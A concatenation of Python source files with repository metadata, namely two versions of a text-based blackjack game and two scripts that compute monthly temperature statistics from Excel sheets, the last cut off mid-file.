def dealto(deckdealtfrom, deckdealtto, sparedeck):
    """Move the top card of deckdealtfrom into deckdealtto (in place).

    When the source deck is exhausted, the spare (used-card) pile is
    shuffled back in first and then emptied.  All three lists are
    mutated in place and also returned for convenience.
    """
    if not deckdealtfrom:
        deckdealtfrom.extend(sparedeck)
        random.shuffle(deckdealtfrom)
        del sparedeck[:]
    deckdealtto.append(deckdealtfrom.pop())
    return deckdealtfrom, deckdealtto, sparedeck
def handstatement(handtoprint, userflag):
    """Print whose hand it is, the cards in it, and the hand's value."""
    # TODO: incorporate proper english at some point.
    cards = ''.join(' ' + name + ',' for name in handtoprint)
    print(userflag + ' hand is ' + cards + ' worth ' +
          str(handvalue(handtoprint)) + '.')
def playerdecision_dialog(bet_valuepd, playerchipspd, playerstandpd, playerhandpd, deckdealtfromph, usedcardspd, quittrackerpd, retries=6, decideflag = False):
    """Ask the player for this hand's action (hit / stand / double) and
    apply it.

    Doubling doubles the bet, deals exactly one card, and stands -- but
    is refused when the doubled bet exceeds the player's chips.  After
    `retries` unusable answers the player is ejected (quit flag set,
    bet zeroed).
    """
    #dialog asking the player what action they want this hand.
    while (retries > 0) and (decideflag == False):
        playeraction = input('Do you want to hit, stand, or double? ')
        if playeraction in ('h', 'hi', 'ht', 'hit'):
            deckdealtfromph, playerhandpd, usedcardspd = dealto(deckdealtfromph, playerhandpd, usedcardspd)
            decideflag = True
        elif playeraction in ('s', 'st', 'sta', 'stan', 'stand'):
            playerstandpd = True
            decideflag = True
        elif playeraction in ('d', 'do', 'dou', 'doub', 'doubl', 'double' ):
            if 2*bet_valuepd > playerchipspd:
                print('I\'m sorry, you can\'t bet more chips than you have.')
                retries = retries - 1
            else:
                bet_valuepd = 2*bet_valuepd
                deckdealtfromph, playerhandpd, usedcardspd = dealto(deckdealtfromph, playerhandpd, usedcardspd)
                playerstandpd = True
                decideflag = True
        #will need to add 'surrender' and 'split' here, if implemented
        #elif playeraction in ('surren', 'surrender'): # supposed to only be available on first decision of hand, and results in quit game -> complicated
        # playerstandpd = True
        # bet_valuepd = bet_valuepd - int(bet_valuepd/2)
        # decideflag = True
        #elif playeraction in ('sp', 'spl', 'spli', 'split'):
        # supposed to only be available on first decision of hand, and results in two player hands -> complicated
        #decideflag = True
        else:
            retries = retries - 1
            print('I am sorry, I did not understand what you said. Could you repeat it, please?')
    if retries <= 0:
        # Out of retries: eject the player and void the bet.
        quittrackerpd = True
        print(failuretocomply)
        bet_valuepd = 0
    return bet_valuepd, playerstandpd, playerhandpd, deckdealtfromph, usedcardspd, quittrackerpd
def handvalue(handlist):
    """Return the blackjack value of a hand (list of card-name strings).

    Card worth is looked up by the first three letters of the card name.
    One ace may then be promoted from 1 to 11 when that does not bust
    the hand -- the player never wants more than one ace counted as 11.
    """
    handinteger = 0
    ace_present = False
    for card_in_hand in handlist:
        prefix = card_in_hand[:3]
        # Membership test directly on the dict -- the original built a
        # throwaway list of the keys for every single card.
        if prefix in card_value_dictionary:
            handinteger = handinteger + card_value_dictionary[prefix]
            if prefix == 'ace':
                ace_present = True
    if ace_present and handinteger + 10 <= 21:
        handinteger = handinteger + 10
    return handinteger
def bet_result(betvaluebr, playerhandbr, dealerhandbr):
    """Return the signed chip change for the bet: +bet on a win, -bet on
    a loss, 0 on a push; a player blackjack scales the result by 3:2."""
    playerblackjackbr = black_jack_check(playerhandbr)
    playerhandvalue = handvalue(playerhandbr)
    dealerblackjackbr = black_jack_check(dealerhandbr)
    dealerhandvalue = handvalue(dealerhandbr)
    # A player bust loses regardless of the dealer's hand.
    if playerhandvalue > 21:
        betmodifier = -1
    elif dealerhandvalue > 21 and playerhandvalue <= 21:
        betmodifier = 1
    elif dealerhandvalue <= 21 and playerhandvalue <= 21:
        if playerhandvalue > dealerhandvalue:
            betmodifier = 1
        elif playerhandvalue < dealerhandvalue:
            betmodifier = -1
        elif playerhandvalue == dealerhandvalue:
            # Equal totals push unless exactly one side holds a natural.
            if (playerblackjackbr == True) and (dealerblackjackbr == False):
                betmodifier = 1
            elif (playerblackjackbr == False) and (dealerblackjackbr == True):
                betmodifier = -1
            else:
                betmodifier = 0
    # A natural blackjack pays out at 3:2.
    if playerblackjackbr == True:
        betmodifier = (3/2)*betmodifier
    betresultbr = int(betmodifier * betvaluebr)
    return betresultbr
def black_jack_check(handtocheckbjc, isblackjack = False):
    """Return True when the two-card hand is a natural blackjack.

    A blackjack is an ace plus a ten-valued card (ten, jack, queen or
    king).  Bug fix: the original slice card_values[8:12] selected
    nine..queen -- off by one -- so ace+nine was (wrongly) a blackjack
    while ace+king was not; [9:13] selects ten..king.
    """
    tenfacelist = [cardvaluebjc[:3] for cardvaluebjc in card_values[9:13]]
    if len(handtocheckbjc) == 2:
        first = handtocheckbjc[0][:3]
        second = handtocheckbjc[1][:3]
        if first == 'ace' and second in tenfacelist:
            isblackjack = True
        elif second == 'ace' and first in tenfacelist:
            isblackjack = True
    return isblackjack
def bigdeckmaker(numberofdecks, fulldeck=deckofcards):
    """Combine the given number of copies of fulldeck into one big deck."""
    combined = []
    for _ in range(numberofdecks):
        combined.extend(fulldeck)
    return combined
def get_number_from_player(playermaxchoice, maxstring, inputstring, minstring, quittrackergnfp, retries=6):
    """Dialog asking the player to choose a positive integer.

    Used for both making bets and picking the number of decks.
    Re-prompts up to `retries` times on bad input, then ejects the
    player: prints failuretocomply and returns (0, True).

    Bug fix: the original only inspected the first character, so input
    like "1x" passed the check and int() raised an uncaught ValueError;
    str.isdigit() now validates the whole string (and an empty string
    simply counts as a bad answer).
    """
    while retries > 0:
        playerchoice = input(inputstring)
        if playerchoice.isdigit():
            playerchoice_int = int(playerchoice)
            if 0 < playerchoice_int <= playermaxchoice:
                return playerchoice_int, quittrackergnfp
            elif playerchoice_int < 1:
                print(minstring+' Try again.')
            else:
                print(maxstring + str(playermaxchoice) + '. Try again.')
        else:
            print('Please enter an integer.')
        retries = retries - 1
    # Out of retries: eject the player.
    print(failuretocomply)
    quittrackergnfp = True
    return 0, quittrackergnfp
def get_number_bet(totalplayerchips, quittrackergnb):
    """Convenience wrapper: ask the player how many chips to bet."""
    numberofchips, quittrackergnb = get_number_from_player(
        totalplayerchips,
        'You may bet at most ',
        'Please type how many chips would you like to bet: ',
        'You must bet at least one.',
        quittrackergnb)
    return numberofchips, quittrackergnb
def get_number_decks(quittrackergnd):
    """Convenience wrapper: ask the player how many decks to use (max 8)."""
    numberofdecks, quittrackergnd = get_number_from_player(
        8,
        'You may choose at most ',
        'Please choose how many decks your table is using: ',
        'You can\'t play with less than one deck of cards.',
        quittrackergnd)
    return numberofdecks, quittrackergnd
def quit_query(retries=4):
    """Ask whether the player wants to keep playing.

    Returns False to keep playing, True to quit.  Bug fix: the original
    `if retries < 0` test inside the loop could never fire (the loop
    exits when retries reaches 0), so failuretocomply was unreachable
    and the function fell off the end returning None after the retries
    were exhausted -- which callers treated as "keep playing".  An
    uncooperative player is now ejected (returns True), consistent with
    the other dialogs.
    """
    while retries > 0:
        ok = input('Do you want to keep playing, Yes or No? ')
        if ok in ('y', 'ye', 'yes'):
            return False
        if ok in ('n', 'no', 'nop', 'nope'):
            return True
        retries = retries - 1
        print('Yes or no, please!')
    print(failuretocomply)
    return True
if __name__ == "__main__":
playgame()
| {
"repo_name": "BlueHat-GURU/python-blackjack",
"path": "blackjacktwod.py",
"copies": "1",
"size": "11579",
"license": "mit",
"hash": 7946796325190315000,
"line_mean": 34.6276923077,
"line_max": 159,
"alpha_frac": 0.6480697815,
"autogenerated": false,
"ratio": 3.681717011128776,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9738748109115671,
"avg_score": 0.018207736702620957,
"num_lines": 325
} |
## A program to play Blackjack
## By BlueHat GURU
## Written in Python 3.4.1
""" Assumption: players already know how to play blackjack,
and do not require educating."""
"""This is just defining a deck of cards,
returning it as a list in numerical_suit order."""
card_values = ('ace', 'two', 'three', 'four', 'five', 'six', 'seven',\
 'eight', 'nine', 'ten', 'jack', 'queen', 'king')
deck_suits = ('_clubs', '_diamonds', '_hearts', '_spades')
deckofcards = [ value+suit for value in card_values for suit in deck_suits]
"""Build a dictionary of card values for the handvalue calculation:
keys are the first three letters of each card name, values the blackjack
worth (ten and face cards capped at 10; aces start at 1 -- promotion to
11 happens in handvalue)."""
card_value_dictionary = {}
card_value_counter = 0
for card in card_values:
    card_value_counter = card_value_counter + 1
    if card_value_counter > 10:
        card_value_counter = 10
    card_value_dictionary[card[:3]] = card_value_counter
"""import a couple of packages that blackjack won't run without."""
import random
import math
# Ejection message printed by every dialog when the player keeps giving
# unusable answers.
failuretocomply = """
Local laws forbid us from taking money from people
who can't understand our instructions.
I'm going to have to ask you to leave."""
# Naming conventions:
"""
shoedeck = the deck being dealt from at the table.
dealerdeck = the dealer's deck/hand
playerdeck = the player's deck/hand
useddeck = where the used cards go.
bet_value = how many chips the player is betting
bet_result = above, with appropriate modifiers
playerchips = the total of how many chips the player has
quittracker = a boolean noting whether the player wants to quit,
or is getting ejected.
dealerhandvalue = the integer value of the dealer's hand.
playerhandvalue = the integer value of the player's hand.
numberofdecks = how many decks are in the shoe at the table the player is at.
playerstand = boolean set to true of the player stands
Suffix local versions of these variables with
the initials of the function they appear in.
Don't bother with purely local variables or retries.
"""
def playgame(playerchipspg=100, quittrackerpg = False):
    """The core function that calls all others to play the game.
    Has an initial setup block (shoe size, double-shuffled shoe).
    Then loops until the player looses all chips or quits."""
    print('Welcome to our casino. You have ' + str(playerchipspg) +\
          ' chips to play with.')
    numberofdeckspg, quittrackerpg = get_number_decks(quittrackerpg)
    shoedeckpg = bigdeckmaker(numberofdeckspg)
    random.shuffle(shoedeckpg)
    random.shuffle(shoedeckpg) # seems to be more thoroughly shuffled with two
    useddeckpg = []
    while (playerchipspg > 0 and quittrackerpg == False):
        bet_valuepg, quittrackerpg =\
                                get_number_bet(playerchipspg, quittrackerpg)
        if quittrackerpg: # eject the player for bad answers
            break
        bet_resultpg, shoedeckpg, useddeckpg, quittrackerpg =\
                                playhand(bet_valuepg, playerchipspg, shoedeckpg,\
                                         useddeckpg, quittrackerpg)
        playerchipspg = playerchipspg + bet_resultpg
        print('You now have ' + str(playerchipspg) + ' chips.')
        if quittrackerpg == False:
            quittrackerpg = quit_query()
    print('You have ' + str(playerchipspg) + ' chips as you leave the casino.')
def playhand(bet_valueph, playerchipsph, shoedeckph,\
             useddeckph, quittrackerph):
    """Plays through a hand.
    Initializes internal control variables.
    Does an initial deal (player, dealer, player).
    Loops through the player playing their hand.
    Loops through the dealer hitting until >= 17.
    Calls bet_result to calculate the result of the bet.
    Puts the cards from both hands into the used pile.

    Consistency fix: the original assigned dealto()'s returns to stale
    names (deckatthetable, usedcards) and playerdecision_dialog()'s hand
    to playerhandph -- it only worked because dealto mutates its list
    arguments in place.  The assignment targets now match the names that
    are actually read.
    """
    playerdeckph=[]
    dealerdeckph=[]
    playerhandvalueph = 0
    dealerhandvalueph = 0
    playerstandph = False
    shoedeckph, playerdeckph, useddeckph =\
                    dealto(shoedeckph, playerdeckph, useddeckph)
    handstatement(playerdeckph, 'Your')
    shoedeckph, dealerdeckph, useddeckph =\
                    dealto(shoedeckph, dealerdeckph, useddeckph)
    handstatement(dealerdeckph, 'The dealer\'s')
    shoedeckph, playerdeckph, useddeckph =\
                    dealto(shoedeckph, playerdeckph, useddeckph)
    handstatement(playerdeckph, 'Your')
    while ( (playerhandvalueph < 21) and (playerstandph != True)):
        bet_valueph, playerstandph, playerdeckph,\
        shoedeckph, useddeckph, quittrackerph = \
                    playerdecision_dialog(bet_valueph, playerchipsph,\
                                          playerstandph, playerdeckph,\
                                          shoedeckph, useddeckph,\
                                          quittrackerph)
        if quittrackerph: # eject the player for bad answers
            break
        playerhandvalueph = handvalue(playerdeckph)
        handstatement(playerdeckph, 'Your')
    while ( dealerhandvalueph < 17) and (quittrackerph == False):
        shoedeckph, dealerdeckph, useddeckph =\
                    dealto(shoedeckph, dealerdeckph, useddeckph)
        dealerhandvalueph = handvalue(dealerdeckph)
        handstatement(dealerdeckph, 'The dealer\'s')
    bet_resultph = bet_result(bet_valueph, playerdeckph, dealerdeckph)
    useddeckph = useddeckph + playerdeckph + dealerdeckph
    return bet_resultph, shoedeckph, useddeckph, quittrackerph
def dealto(shoedeckdt, deckdealtto, useddeckdt):
    """Deal one card from the shoe into the given hand (all in place).

    Before dealing, if the used pile has grown to more than three times
    the shoe, the used cards are shuffled back into the shoe and the
    pile is emptied -- mirroring how real casinos blunt card counting.
    """
    if len(useddeckdt) > 3 * len(shoedeckdt):
        shoedeckdt.extend(useddeckdt)
        random.shuffle(shoedeckdt)
        useddeckdt.clear()
    deckdealtto.append(shoedeckdt.pop())
    return shoedeckdt, deckdealtto, useddeckdt
def handstatement(handtoprint, userflag='user'):
    """Print whose hand it is, the cards it holds, and its value.

    Future development: make it return proper English,
    with Oxford commas.
    """
    cards = ''.join(' ' + name + ',' for name in handtoprint)
    print(userflag + ' hand is ' + cards + ' worth ' +
          str(handvalue(handtoprint)) + '.')
def playerdecision_dialog(bet_valuepd, playerchipspd, playerstandpd,\
                            playerdeckpd, shoedeckph, useddeckpd,\
                            quittrackerpd, retries=6, decideflag = False):
    """Dialog in which the player decides their next action.
    Then it implements the decision before returning to the loop in playhand.
    Doubling doubles the bet, takes exactly one card, and stands -- it is
    refused when the doubled bet exceeds the player's chips.
    Also sets conditions to eject the player from the game if they
    insist on invalid responses."""
    while (retries > 0) and (decideflag == False):
        playeraction = input('Do you want to hit, stand, or double? ')
        if playeraction in ('h', 'hi', 'ht', 'hit'):
            shoedeckph, playerdeckpd, useddeckpd =\
                                    dealto(shoedeckph, playerdeckpd, useddeckpd)
            decideflag = True
        elif playeraction in ('s', 'st', 'sta', 'stan', 'stand'):
            playerstandpd = True
            decideflag = True
        elif playeraction in ('d', 'do', 'dou', 'doub', 'doubl', 'double' ):
            if 2*bet_valuepd > playerchipspd:
                print('I\'m sorry, you can\'t bet more chips than you have.')
                retries = retries - 1
            else:
                bet_valuepd = 2*bet_valuepd
                shoedeckph, playerdeckpd, useddeckpd =\
                                            dealto(shoedeckph, playerdeckpd,\
                                                   useddeckpd)
                playerstandpd = True
                decideflag = True
        #will need to add 'surrender' and 'split' here, if implemented
        #elif playeraction in ('surren', 'surrender'):
        # supposed to onlybe available on first decision of hand,
        #and results in quit game -> complicated
        # playerstandpd = True
        # bet_valuepd = bet_valuepd - int(bet_valuepd/2)
        # decideflag = True
        #elif playeraction in ('sp', 'spl', 'spli', 'split'):
        # supposed to only be available on first decision of hand,
        #and results in two player hands -> complicated
        #decideflag = True
        else:
            retries = retries - 1
            print('I am sorry, I did not understand what you said.'\
                  ' Could you repeat it, please?')
    if retries <= 0:
        # Out of retries: eject the player and void the bet.
        quittrackerpd = True
        print(failuretocomply)
        bet_valuepd = 0
    return bet_valuepd, playerstandpd, playerdeckpd,\
           shoedeckph, useddeckpd, quittrackerpd
def handvalue(handlist): # to compute what a hand is worth
    """Computes what a hand is worth and returns it.
    Makes use of the fact that no more than one ace will ever
    be counted as an 11."""
    handinteger = 0
    ace_present = False
    for card_in_hand in handlist:
        prefix = card_in_hand[:3]
        # Membership test directly on the dict -- the original built a
        # throwaway list of the keys for every single card.
        if prefix in card_value_dictionary:
            handinteger = handinteger + card_value_dictionary[prefix]
            if prefix == 'ace':
                ace_present = True
    #The player will never wish to count more than one ace as an 11
    if ace_present and handinteger + 10 <= 21:
        handinteger = handinteger + 10
    return handinteger
def bet_result(bet_valuebr, playerdeckbr, dealerdeckbr):
    """Calculates whether the bet is gained or lost by the player.
    An initial block to set some local variables for convenience.
    Then a bunch of conditions to determine whether the player or
    dealer wins (so is the bet + or -).
    Finally, modifies the bet if there is a blackjack for the player."""
    playerblackjackbr = black_jack_check(playerdeckbr)
    playerhandvaluebr = handvalue(playerdeckbr)
    dealerblackjackbr = black_jack_check(dealerdeckbr)
    dealerhandvaluebr = handvalue(dealerdeckbr)
    # A player bust loses regardless of the dealer's hand.
    if playerhandvaluebr > 21:
        betmodifier = -1
    elif dealerhandvaluebr > 21 and playerhandvaluebr <= 21:
        betmodifier = 1
    elif dealerhandvaluebr <= 21 and playerhandvaluebr <= 21:
        if playerhandvaluebr > dealerhandvaluebr:
            betmodifier = 1
        elif playerhandvaluebr < dealerhandvaluebr:
            betmodifier = -1
        elif playerhandvaluebr == dealerhandvaluebr:
            # Equal totals push unless exactly one side holds a natural.
            if (playerblackjackbr == True) and (dealerblackjackbr == False):
                betmodifier = 1
            elif (playerblackjackbr == False) and (dealerblackjackbr == True):
                betmodifier = -1
            else:
                betmodifier = 0
    # A natural blackjack pays out at 3:2.
    if playerblackjackbr == True:
        betmodifier = (3/2)*betmodifier
    bet_resultbr = int(betmodifier * bet_valuebr)
    return bet_resultbr
def black_jack_check(handtocheckbjc, isblackjack = False):
    """Returns a boolean on whether the hand is a natural blackjack:
    an ace plus a ten-valued card (ten, jack, queen or king).

    Bug fix: the original slice card_values[8:12] selected nine..queen
    -- off by one -- so ace+nine was (wrongly) a blackjack while
    ace+king was not; [9:13] selects ten..king.
    """
    tenfacelist = [cardvaluebjc[:3] for cardvaluebjc in card_values[9:13]]
    if len(handtocheckbjc) == 2:
        first = handtocheckbjc[0][:3]
        second = handtocheckbjc[1][:3]
        if first == 'ace' and second in tenfacelist:
            isblackjack = True
        elif second == 'ace' and first in tenfacelist:
            isblackjack = True
    return isblackjack
def bigdeckmaker(numberofdecksbdm, loopdeck=deckofcards):
    """Return the giant deck that gets put in the shoe: the chosen
    number of copies of the already defined deckofcards, concatenated."""
    makedeck = []
    for _ in range(numberofdecksbdm):
        makedeck.extend(loopdeck)
    return makedeck
def get_number_from_player(maxchoicegnfp, maxstringgnfp, inputstringgnfp,\
                           minstringgnfp, quittrackergnfp, retries=6):
    """Dialog asking player to choose an integer.
    Used for both making bets and picking the size of the shoe.
    Re-prompts up to `retries` times on bad input, then ejects the
    player: prints failuretocomply and returns (0, True).

    Bug fix: the original only inspected the first character, so input
    like "1x" passed the check and int() raised an uncaught ValueError;
    str.isdigit() now validates the whole string (and an empty string
    simply counts as a bad answer).
    """
    while retries > 0:
        playerchoice = input(inputstringgnfp)
        if playerchoice.isdigit():
            playerchoice_int = int(playerchoice)
            if 0 < playerchoice_int <= maxchoicegnfp:
                return playerchoice_int, quittrackergnfp
            elif playerchoice_int < 1:
                print(minstringgnfp+' Try again.')
            else:
                print(maxstringgnfp + str(maxchoicegnfp) + '. Try again.')
        else:
            print('Please enter an integer.')
        retries = retries - 1
    # Out of retries: eject the player.
    print(failuretocomply)
    quittrackergnfp = True
    return 0, quittrackergnfp
def get_number_bet(playerchipsgnb, quittrackergnb):
    """A convenience wrapper around get_number_from_player.
    Returns the number of chips bet, and whether the player needs to be
    ejected for bad answers."""
    bet_valuegnb, quittrackergnb = get_number_from_player(
        playerchipsgnb,
        'You may bet at most ',
        'Please type how many chips would you like to bet: ',
        'You must bet at least one.',
        quittrackergnb)
    return bet_valuegnb, quittrackergnb
def get_number_decks(quittrackergnd):
    """A convenience wrapper around get_number_from_player.
    Returns the number of decks (max 8), and whether the player needs to
    be ejected for bad answers."""
    numberofdecksgnd, quittrackergnd = get_number_from_player(
        8,
        'You may choose at most ',
        'Please choose how many decks your table is using: ',
        'You can\'t play with less than one deck of cards.',
        quittrackergnd)
    return numberofdecksgnd, quittrackergnd
def quit_query(retries=4):
    """Ask whether the player wants to keep playing.

    Returns False to keep playing, True to quit.  Bug fix: the original
    `if retries < 0` test inside the loop could never fire (the loop
    exits when retries reaches 0), so failuretocomply was unreachable
    and the function fell off the end returning None after the retries
    were exhausted -- which callers treated as "keep playing".  An
    uncooperative player is now ejected (returns True), consistent with
    the other dialogs.
    """
    while retries > 0:
        ok = input('Do you want to keep playing, Yes or No? ')
        if ok in ('y', 'ye', 'yes'):
            return False
        if ok in ('n', 'no', 'nop', 'nope'):
            return True
        retries = retries - 1
        print('Yes or no, please!')
    print(failuretocomply)
    return True
"""
Future developments (aka a bit of the sausage making):
Write a function to print failuretocomply, set quittracker,
and eject the player from the game.
Put the quittracker at the beginning of all functions, so that
get_number_decks can be improved by future implementation of
variable max number of decks.
Combine the betting and quitting dialog, which will require splitting off
from the shoesize dialog.
Turn this into a package with one or a few closely related functions in
each file, instead of this giant one.
"""
if __name__ == "__main__":
playgame()
| {
"repo_name": "BlueHat-GURU/python-blackjack",
"path": "blackjackfoura.py",
"copies": "1",
"size": "15763",
"license": "mit",
"hash": -6274417034087758000,
"line_mean": 33.1930585683,
"line_max": 79,
"alpha_frac": 0.6249444903,
"autogenerated": false,
"ratio": 3.9182202336564753,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5043164723956475,
"avg_score": null,
"num_lines": null
} |
# a program to print the monthly averages
import numpy as np
from xlrd import open_workbook
import datetime
import sys
date_start_epoch=datetime.datetime(1899,12,30)
def compute_averages(file_name,cdate,c1,c2,c3):
# variables
#####################################
#file_name="TSB001.xlsx"
sheet_index=0
column_date_index=cdate
column_temp_1_index=c1
column_temp_2_index=c2
column_temp_3_index=c3
avg_file_name=file_name+".averages.txt"
#####################################
print ""
print "file name :",file_name
print "date column :",column_date_index
print "temperature column 1 :",column_temp_1_index
print "temperature column 2 :",column_temp_2_index
print "temperature column 3 :",column_temp_2_index
print "output file :",avg_file_name
print ""
# open the workbook
print "opening the file ",file_name
print ""
book=open_workbook(file_name)
print "Done. Now computing the averages..."
print ""
# open the sheet
sht=book.sheet_by_index(sheet_index)
# open the column
c_date=sht.col_values(column_date_index)
c_t_1=sht.col_values(column_temp_1_index)
c_t_2=sht.col_values(column_temp_2_index)
c_t_3=sht.col_values(column_temp_3_index)
month_check=0
month_list=[]
mean_t_list_1=[]
mean_t_list_2=[]
mean_t_list_3=[]
tot_t_1=[]
tot_t_2=[]
tot_t_3=[]
for i in range(len(c_date)):
try:
current_date = date_start_epoch + datetime.timedelta(days=int(c_date[i]))
# am I a new month this case will be satisfied in the first iteration
if current_date.month != month_check :
# if not the first time I should append the values
if month_check != 0 :
month_list.append(month_check)
mean_t_list_1.append(np.mean(tot_t_1))
mean_t_list_2.append(np.mean(tot_t_2))
mean_t_list_3.append(np.mean(tot_t_3))
tot_t_1=[]
tot_t_2=[]
tot_t_3=[]
if c_t_1[i] != 0 :
tot_t_1.append( float(c_t_1[i]) )
if c_t_2[i] != 0 :
tot_t_2.append( float(c_t_2[i]) )
if c_t_3[i] != 0 :
tot_t_3.append( float(c_t_3[i]) )
month_check = current_date.month
else:
if c_t_1[i] != 0 :
tot_t_1.append( float(c_t_1[i]) )
if c_t_2[i] != 0 :
tot_t_2.append( float(c_t_2[i]) )
if c_t_3[i] != 0 :
tot_t_3.append( float(c_t_3[i]) )
except(ValueError):
print "Skipping the value ",i,c_date[i]
# append the mean of the last month
month_list.append(month_check)
mean_t_list_1.append(np.mean(tot_t_1))
mean_t_list_2.append(np.mean(tot_t_2))
mean_t_list_3.append(np.mean(tot_t_3))
print ""
print "month","temp-1","temp-2","temp-3"
for i in range(len(month_list)):
print month_list[i],mean_t_list_1[i],mean_t_list_2[i],mean_t_list_3[i]
np.savetxt(avg_file_name,np.asarray([month_list,mean_t_list_1,mean_t_list_2,mean_t_list_3]).T,fmt='%5.3f',delimiter=",")
if __name__ == '__main__':
    # Expect exactly five arguments: file name, date column index, and
    # the three temperature column indices.
    if len(sys.argv) == 6:
        file_name=str(sys.argv[1])
        cdate=int(sys.argv[2])
        c1=int(sys.argv[3])
        c2=int(sys.argv[4])
        c3=int(sys.argv[5])
        if c1<0 or c2<0 or c3<0 :
            print "column numbers should be >= 0! try again..."
        else:
            compute_averages(file_name,cdate,c1,c2,c3)
    else:
        print "usage: python ",sys.argv[0], "<file_name>", "<date>" , "<temp-1>","<temp-2>","<temp-3>"
        print "example: python",sys.argv[0], "TSB001.xlsx 0 1 7 11"
| {
"repo_name": "tbs1980/Retrofit",
"path": "source/monthly_average.py",
"copies": "1",
"size": "3287",
"license": "mpl-2.0",
"hash": -5589163391501690000,
"line_mean": 23.3481481481,
"line_max": 121,
"alpha_frac": 0.6206267113,
"autogenerated": false,
"ratio": 2.368155619596542,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3488782330896542,
"avg_score": null,
"num_lines": null
} |
# a program to print the monthly averages
import numpy as np
from xlrd import open_workbook
import datetime
import sys
date_start_epoch=datetime.datetime(1899,12,30) #starting epoch of the date in excel
def get_threasholds(month,room):
    """Return the (max, min) comfort temperature thresholds for a room.

    Winter (Oct-Apr) and summer (May-Sep) use different thresholds;
    summer has no meaningful minimum, encoded as -100.

    Raises RuntimeError for an unknown room or month.  (Bug fix: the
    original constructed RuntimeError instances without `raise`, so bad
    input silently fell through to the placeholder defaults.)
    """
    winter = [10,11,12,1,2,3,4]
    summer = [5,6,7,8,9]
    if month in winter:
        if room == "bedroom":
            thr_max = 19.
            thr_min = 17.
        elif room == "livingroom":
            thr_max = 23.
            thr_min = 22.
        else:
            raise RuntimeError("Unknown room")
    elif month in summer:
        if room == "bedroom":
            thr_max = 23.
            thr_min = -100.
        elif room == "livingroom":
            thr_max = 25.
            thr_min = -100.
        else:
            raise RuntimeError("Unknown room")
    else:
        raise RuntimeError("Unknown month")
    return thr_max,thr_min
def compute_averages(file_name,cdate,c1,room):
    """
    Compute the monthly average, min, max of column c1 given the date column
    cdate, plus the percentage of readings outside the comfort thresholds
    for the room. Results are printed and written to
    "<file_name>.stats_<c1>_<room>.txt".
    @param file_name name of the input xlsx file
    @param cdate column corresponding to the date
    @param c1 column number corresponding to the 1st data
    @param room "bedroom" or "livingroom" (selects the thresholds)
    """
    # variables
    #####################################
    #file_name="TSB001.xlsx"
    sheet_index=0
    column_date_index=cdate
    column_temp_1_index=c1
    avg_file_name = file_name+".stats_"+str(c1)+"_"+room+".txt"
    #####################################
    print ""
    print "file name :",file_name
    print "date column :",column_date_index
    print "temperature column :",column_temp_1_index
    print "room :",room
    print "output file :",avg_file_name
    print ""
    #return
    # open the workbook
    print "opening the file ",file_name
    print ""
    book=open_workbook(file_name)
    print "Done. Now computing the averages..."
    print ""
    # open the sheet
    sht=book.sheet_by_index(sheet_index)
    # open the column
    c_date=sht.col_values(column_date_index)
    c_t=sht.col_values(column_temp_1_index)
    # month_check is the month of the rows currently being accumulated;
    # 0 means "no month seen yet".
    month_check=0
    month_list=[]
    mean_t_list=[]
    min_t_list = []
    max_t_list = []
    thr_min_list = []
    thr_max_list = []
    greater_than_max = []  # % of readings above the upper threshold, per month
    less_than_min = []     # % of readings below the lower threshold, per month
    tot_t=[]               # readings accumulated for the current month
    for i in range(len(c_date)):
        try:
            #find the current month
            current_date = date_start_epoch + datetime.timedelta(days=int(c_date[i]))
            # am I a new month this case will be satisfied in the first iteration
            if current_date.month != month_check :
                # if not the first time I should append the values
                if month_check != 0 :
                    #print "month ",month_check
                    month_list.append(month_check)
                    if len(tot_t) >0 :
                        mean_t_list.append(np.mean(tot_t))
                        min_t_list.append(np.min(tot_t))
                        max_t_list.append(np.max(tot_t))
                        thr_max,thr_min=get_threasholds(month_check,room)
                        tot_t_npy = np.asarray(tot_t)
                        thr_min_list.append(thr_min)
                        thr_max_list.append(thr_max)
                        greater_than_max.append(100.*len(np.where(tot_t_npy>thr_max)[0])/float(len(tot_t)))
                        less_than_min.append(100*len(np.where(tot_t_npy<thr_min)[0])/float(len(tot_t)))
                    else :
                        # no valid readings this month: store sentinel values
                        mean_t_list.append(-1e90)
                        min_t_list.append(-1e90)
                        max_t_list.append(-1e90)
                        thr_max,thr_min=get_threasholds(month_check,room)
                        thr_max_list.append(thr_max)
                        thr_min_list.append(thr_min)
                        greater_than_max.append(-1e90)
                        less_than_min.append(-1e90)
                    tot_t=[]
                #if value is not FALSE add it to the list
                if c_t[i] != 0 :
                    tot_t.append( float(c_t[i]) )
                month_check = current_date.month
            else: # if i am not a new month, keep appending the list
                if c_t[i] != 0 :
                    tot_t.append( float(c_t[i]) )
        except(ValueError):
            # non-numeric date or temperature cell (e.g. a header row)
            print "Skipping the value ",i,c_date[i]
            #pass
    # append the mean of the last month
    month_list.append(month_check)
    if len(tot_t) >0 :
        mean_t_list.append(np.mean(tot_t))
        min_t_list.append(np.min(tot_t))
        max_t_list.append(np.max(tot_t))
        thr_max,thr_min=get_threasholds(month_check,room)
        tot_t_npy = np.asarray(tot_t)
        thr_min_list.append(thr_min)
        thr_max_list.append(thr_max)
        greater_than_max.append(100.*len(np.where(tot_t_npy>thr_max)[0])/float(len(tot_t)))
        less_than_min.append(100*len(np.where(tot_t_npy<thr_min)[0])/float(len(tot_t)))
    else :
        mean_t_list.append(-1e90)
        min_t_list.append(-1e90)
        max_t_list.append(-1e90)
        thr_max,thr_min=get_threasholds(month_check,room)
        thr_max_list.append(thr_max)
        thr_min_list.append(thr_min)
        greater_than_max.append(-1e90)
        less_than_min.append(-1e90)
    # print the averages
    print ""
    print "month","mean","min","max","thr-min","thr-max","less-than-min%","greater-than-max%"
    for i in range(len(month_list)):
        print month_list[i],mean_t_list[i],min_t_list[i],max_t_list[i],thr_min_list[i],thr_max_list[i],less_than_min[i],greater_than_max[i]
    # write the averages to a file
    np.savetxt(avg_file_name,np.asarray([month_list,mean_t_list,min_t_list,max_t_list,thr_min_list,thr_max_list,less_than_min,greater_than_max]).T,fmt='%5.3f',delimiter=",")
if __name__ == '__main__':
    # CLI: <file_name> <date-column> <temperature-column> <bedroom/livingroom>
    if len(sys.argv) == 5:
        file_name=str(sys.argv[1])
        cdate=int(sys.argv[2])
        c1=int(sys.argv[3])
        room = str(sys.argv[4])
        rooms = ["bedroom","livingroom"]
        # the temperature column index must be positive and the room recognised
        if c1>0 and (room in rooms):
